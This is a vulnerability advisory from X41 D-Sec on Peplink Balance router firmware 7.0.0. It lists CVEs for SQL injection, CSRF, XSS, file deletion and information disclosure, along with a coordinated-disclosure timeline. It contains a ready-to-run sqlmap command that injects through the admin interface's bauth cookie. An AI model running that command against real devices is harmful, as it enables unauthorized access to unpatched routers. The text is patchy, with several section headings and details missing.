Professional Documents
Culture Documents
Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/
Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.
./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi"
--cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647"
-p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ
--flush-session -t trace.log --prefix "'" --suffix "--" -a
Workarounds
-----------
Install vendor supplied update.
No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Workarounds
-----------
Install vendor supplied update.
Workarounds
-----------
Install vendor supplied update.
This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
Workarounds
-----------
Install vendor supplied update.
File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
Workarounds
-----------
Install vendor supplied update.
Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-----8<------------------------------------------------
Master LAN Address = [ <internal ip> / <netmask> ]
Serial Number = [ <serial number> ]
HA Group ID = [ <group id> ]
Virtual IP = [ <internal ip> / <netmask> ]
Submitted syncid = [ <syncid> ]
-----8<------------------------------------------------
This information can be valuable for an attacker to exploit other issues.
Workarounds
-----------
Install vendor supplied update.
Timeline
--------
2017-04-07 Issue found
2017-04-10 Vendor asked for security contact
2017-04-11 Vendor replied, send GPG key
2017-04-11 Information supplied to vendor
2017-04-11 Vendor acknowledges that the information is received
2017-04-17 Vendor acknowledges SQL injection
2017-05-08 CVE IDs for all issues requested
2017-05-08 CVE IDs assigned
2017-05-11 Vendor informed about CVE IDs
2017-05-29 Version provided to X41 for testing
2017-05-31 First test results send back to the vendor
2017-06-01 Remaining test results send back to the vendor
2017-06-05 Coordinated Firmware and Advisory release